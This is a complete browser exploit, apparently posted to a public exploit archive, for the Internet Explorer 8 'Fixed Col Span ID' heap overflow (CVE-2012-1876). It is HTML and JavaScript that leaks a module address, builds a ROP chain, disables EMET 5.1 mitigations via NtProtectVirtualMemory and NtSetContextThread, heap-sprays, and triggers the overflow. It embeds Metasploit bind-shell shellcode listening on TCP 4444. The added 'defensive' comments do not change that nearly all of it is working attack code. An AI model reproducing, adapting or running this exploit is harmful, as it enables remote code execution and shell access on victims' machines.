Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.1 Bypass (MS12-037)
<!--
 ** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.1 bypass
 ** Exploit Coded by sickness || EMET 5.1 bypass by ryujin
 ** http://www.offensive-security.com/vulndev/disarming-and-bypassing-emet-5-1/
 ** Affected Software: Internet Explorer 8
 ** Vulnerability: Fixed Col Span ID
 ** CVE: CVE-2012-1876
 ** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 5.1
 **
 ** Review notes (defensive context):
 ** - The issue is the one fixed by MS12-037 (see page title); this sample
 **   only exercises an unpatched IE8 build.
 ** - Every gadget address below is `cbuttonlayout + <fixed offset>`, so the
 **   chain is tied to the exact IE 8.0.7601.17514 / EMET 5.1 module layout
 **   listed above.
 ** - Per its own generator header, the embedded payload is Metasploit
 **   windows/shell_bind_tcp with LPORT=4444, i.e. the browser process opens a
 **   listener on TCP 4444 - a useful behavioural indicator when triaging this
 **   sample in host or network telemetry.
 ** - Execution is sequenced by three setTimeout stages (400 / 450 / 700 ms):
 **   leak(), get_leak() -> heapspray(), trigger_overflow().
-->
<html>
<body>
<div id="evil"></div>
<table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table>
<script language='javascript'>

// Reassemble two UTF-16 code units into one 32-bit integer, low unit first
// (little-endian): str[0] is the low half, str[1] the high half.
function strtoint(str) { return str.charCodeAt(1)*0x10000 + str.charCodeAt(0); }

// Filler strings of >= 500 characters; each slot below keeps the first
// (0x100-6)/2 = 125 characters of one of them.
var free = "EEEE"; while ( free.length < 500 ) free += free;
var string1 = "AAAA"; while ( string1.length < 500 ) string1 += string1;
var string2 = "BBBB"; while ( string2.length < 500 ) string2 += string2;

var fr = new Array(); var al = new Array(); var bl = new Array();
var div_container = document.getElementById("evil"); div_container.style.cssText = "display:none";

// Populate even indices 0..498 with three 125-char strings each, and append a
// <button> to the hidden container on every iteration.
for (var i=0; i < 500; i+=2) { fr[i] = free.substring(0, (0x100-6)/2); al[i] = string1.substring(0, (0x100-6)/2); bl[i] = string2.substring(0, (0x100-6)/2); var obj = document.createElement("button"); div_container.appendChild(obj); }

// Null every other fr[] entry from index 200 upward, forcing a collection after each one.
for (var i=200; i<500; i+=2 ) { fr[i] = null; CollectGarbage(); }

// Builds the ROP chain and payload relative to the leaked base address
// `cbuttonlayout` (a number), then fills spray[] with 100 copies of a block of
// roughly 1 MB of UTF-16 data. `rop` is a scratch variable redeclared with
// `var` for every gadget; each address is rendered as hex and split into its
// low 16 bits (substring(4,8)) and high 16 bits (substring(0,4)) for %u
// encoding - this assumes the hex string is exactly 8 digits.
// Note: the loop index `i` near the end is not declared here, so it reuses
// the top-level `var i`.
function heapspray(cbuttonlayout) {
CollectGarbage();
var rop = cbuttonlayout + 4161; // RET
var rop = rop.toString(16); var rop1 = rop.substring(4,8); var rop2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 11360; // POP EBP
var rop = rop.toString(16); var rop3 = rop.substring(4,8); var rop4 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 111675; // XCHG EAX,ESP
var rop = rop.toString(16); var rop5 = rop.substring(4,8); var rop6 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12377; // POP EBX
var rop = rop.toString(16); var rop7 = rop.substring(4,8); var rop8 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 642768; // POP EDX
var rop = rop.toString(16); var rop9 = rop.substring(4,8); var rop10 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12201; // POP ECX --> Changed
var rop = rop.toString(16); var rop11 = rop.substring(4,8); var rop12 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 5504544; // Writable location
var rop = rop.toString(16); var writable1 = rop.substring(4,8); var writable2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12462; // POP EDI
var rop = rop.toString(16); var rop13 = rop.substring(4,8); var rop14 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12043; // POP ESI --> changed
var rop = rop.toString(16); var rop15 = rop.substring(4,8); var rop16 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 63776; // JMP EAX
var rop = rop.toString(16); var jmpeax1 = rop.substring(4,8); var jmpeax2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 85751; // POP EAX
var rop = rop.toString(16); var rop17 = rop.substring(4,8); var rop18 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 4936; // VirtualProtect()
var rop = rop.toString(16); var vp1 = rop.substring(4,8); var vp2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]
var rop = rop.toString(16); var rop19 = rop.substring(4,8); var rop20 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 234657; // PUSHAD
var rop = rop.toString(16); var rop21 = rop.substring(4,8); var rop22 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 408958; // PUSH ESP
var rop = rop.toString(16); var rop23 = rop.substring(4,8); var rop24 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 2228408; // POP ECX
var rop = rop.toString(16); var rop25 = rop.substring(4,8); var rop26 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1586172; // POP EAX
var rop = rop.toString(16); var rop27 = rop.substring(4,8); var rop28 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]
var rop = rop.toString(16); var rop29 = rop.substring(4,8); var rop30 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1884912; // PUSH EAX
var rop = rop.toString(16); var rop31 = rop.substring(4,8); var rop32 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 2140694; // ADD EAX,ECX
var rop = rop.toString(16); var rop33 = rop.substring(4,8); var rop34 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX
var rop = rop.toString(16); var rop35 = rop.substring(4,8); var rop36 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX
var rop = rop.toString(16); var rop37 = rop.substring(4,8); var rop38 = rop.substring(0,4); // } RET
var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW
var getmodulew = getmodulew.toString(16); var getmodulew1 = getmodulew.substring(4,8); var getmodulew2 = getmodulew.substring(0,4); // } RET
var rop = cbuttonlayout + 3621437; // MOV EAX,EDX
var rop = rop.toString(16); var rop41 = rop.substring(4,8); var rop42 = rop.substring(0,4); // } RET

// Payload assembly: 46 code units of U+4444 filler, then the chain built above.
var shellcode = unescape("%u4444"); while (shellcode.length < 100) shellcode = shellcode + shellcode; var shellcode = shellcode.substr(0, 46);
shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN
shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN

// EMET disable part 0x01 annihilate ROP protections
// Implement the Tachyon detection grid to overcome the Romulan cloaking device.
shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN
shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW Ptr
shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN
shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u5f3c%u07d2"); // EMET_STRING_PTR (GetModuleHandle argument)
shellcode+= unescape("%u7372%u0006"); // Offset to "decoding helper" 0x67372
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN (Get the address of the "decoding helper")
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN
shellcode+= unescape("%u5e84%u07d2"); // Set EBP to successfully return from the "decoding helper"
shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN Call the "decoding helper"
shellcode+= unescape("%u0000%u0000"); // Compensate for function epilogue
shellcode+= unescape("%u0000%u0000"); // Compensate for function epilogue
shellcode+= unescape("%u0000%u0000"); // Compensate for function epilogue
shellcode+= unescape("%u0000%u0000"); // Compensate for function epilogue
shellcode+= unescape("%u"+rop41+"%u"+rop42); // MOV EAX,EDX # RETN
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI # RETN
shellcode+= unescape("%u5f38%u07d2"); // MEM_ADDRESS_PTR (Store CONFIG_STRUCT here for later on)
shellcode+= unescape("%u"+rop37+"%u"+rop38); // MOV DWORD PTR DS:[ESI],EAX
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u01b8%u0000"); // offset to NtProtectVirtualMemory unhooked
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN (Get the address of NtProtectVirtualMemory)
shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN
shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN
shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN
shellcode+= unescape("%uffff%uffff"); // ProcessHandle
shellcode+= unescape("%u5f38%u07d2"); // *BaseAddress
shellcode+= unescape("%u5f34%u07d2"); // NumberOfBytesToProtect
shellcode+= unescape("%u0040%u0000"); // NewAccessProtection
shellcode+= unescape("%u5f30%u07d2"); // OldAccessProtection
shellcode+= unescape("%u5f38%u07d2"); // Reget pointer
shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u0558%u0000"); // Offset to EMET mitigations switch
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u0000%u0000"); // NULL
shellcode+= unescape("%u"+rop35+"%u"+rop36); // MOV DWORD PTR [EAX],ECX # RETN

// Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBX
shellcode+= unescape("%u1024%u0000"); // Size 0x00001024
shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX
shellcode+= unescape("%u0040%u0000"); // 0x00000040
shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX
shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location
shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI
shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI
shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2);// JMP EAX
shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX
shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect()
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]
shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD
shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP

// Store various pointers here
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u18eb"); // NOPs
shellcode+= unescape("%u4242%u4242"); // OldAccessProtection
shellcode+= unescape("%u0564%u0000"); // Size for NtVirtualProtectMemory
shellcode+= unescape("%u4141%u4141"); // Store BaseAddress address on the *stack*
shellcode+= "EMET"; // EMET string
shellcode+= unescape("%u0000%u0000"); // EMET string
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u9090"); // NOPs
// Store various pointers here

// EMET disable part 0x02 annihilate EAF/EAF+ by calling NtSetContextThread
// MOV EAX,DWORD PTR DS:[076D10BCH]
// MOV EAX,DWORD PTR DS:[007D25F48H]
// MOV ESI,DWORD PTR [EAX+518H]
// SUB ESP,2CCH
// MOV DWORD PTR [ESP],10010H
// MOV EDI,ESP
// MOV ECX,2CCH
// ADD EDI,4
// SUB ECX,4
// XOR EAX,EAX
// REP STOS BYTE PTR ES:[EDI]
// PUSH ESP
// PUSH 0FFFFFFFEH
// CALL ESI
shellcode+= unescape("%u38a1%ud25f%u8b07%u18b0%u0005%u8100%uccec" + "%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9" + "%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa" + "%ufe6a%ud6ff");
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u9090"); // NOPs
// EMET disable part 0x02 end

// Bind shellcode on 4444 :)
// msf > generate -t js_le
// windows/shell_bind_tcp - 342 bytes
// http://www.metasploit.com
// VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
// EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
// I would keep the shellcode the same size for better reliability :)
shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +
"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +
"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +
"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +
"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +
"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +
"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +
"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +
"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +
"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +
"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +
"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +
"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +
"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +
"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +
"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +
"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +
"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +
"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +
"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +
"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
"%u006a%uff53%u41d5");

// Total spray should be 1000
// Pad each payload copy to exactly 1000 characters before replicating it.
var padding = unescape("%u9090"); while (padding.length < 1000) padding = padding + padding;
var padding = padding.substr(0, 1000 - shellcode.length);
shellcode+= padding;
while (shellcode.length < 100000) shellcode = shellcode + shellcode;
// One block = 15 chunks of 32768 chars plus a final chunk 19 chars shorter;
// 100 such blocks are kept alive in spray[].
var onemeg = shellcode.substr(0, 64*1024/2);
for (i=0; i<14; i++) { onemeg += shellcode.substr(0, 64*1024/2); }
onemeg += shellcode.substr(0, (64*1024/2)-(38/2));
var spray = new Array();
for (i=0; i<100; i++) { spray[i] = onemeg.substr(0, onemeg.length); }
}

// Stage 1 (t = 400 ms): change the <col> span from the markup's 9 to 19.
function leak(){ var leak_col = document.getElementById("132"); leak_col.width = "41"; leak_col.span = "19"; }

// Stage 2 (t = 450 ms): read two code units out of bl[498], convert them with
// strtoint(), subtract a fixed offset, and schedule heapspray() with the result
// 50 ms later. `hex` is only computed for the (disabled) debug alert.
function get_leak() { var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13)); str_addr = str_addr - 1410704; var hex = str_addr.toString(16); //alert(hex);
setTimeout(function(){heapspray(str_addr)}, 50); }

// Stage 3 (t = 700 ms): set width and span on the same <col> a second time.
function trigger_overflow(){ var evil_col = document.getElementById("132"); evil_col.width = "1312272"; // 0x07D25E40
evil_col.span = "44"; }

// Timer-driven sequencing of the three stages.
setTimeout(function(){leak()}, 400);
setTimeout(function(){get_leak()},450);
setTimeout(function(){trigger_overflow()}, 700);
</script>
</body>
</html>
# 0day.today [2024-10-05] #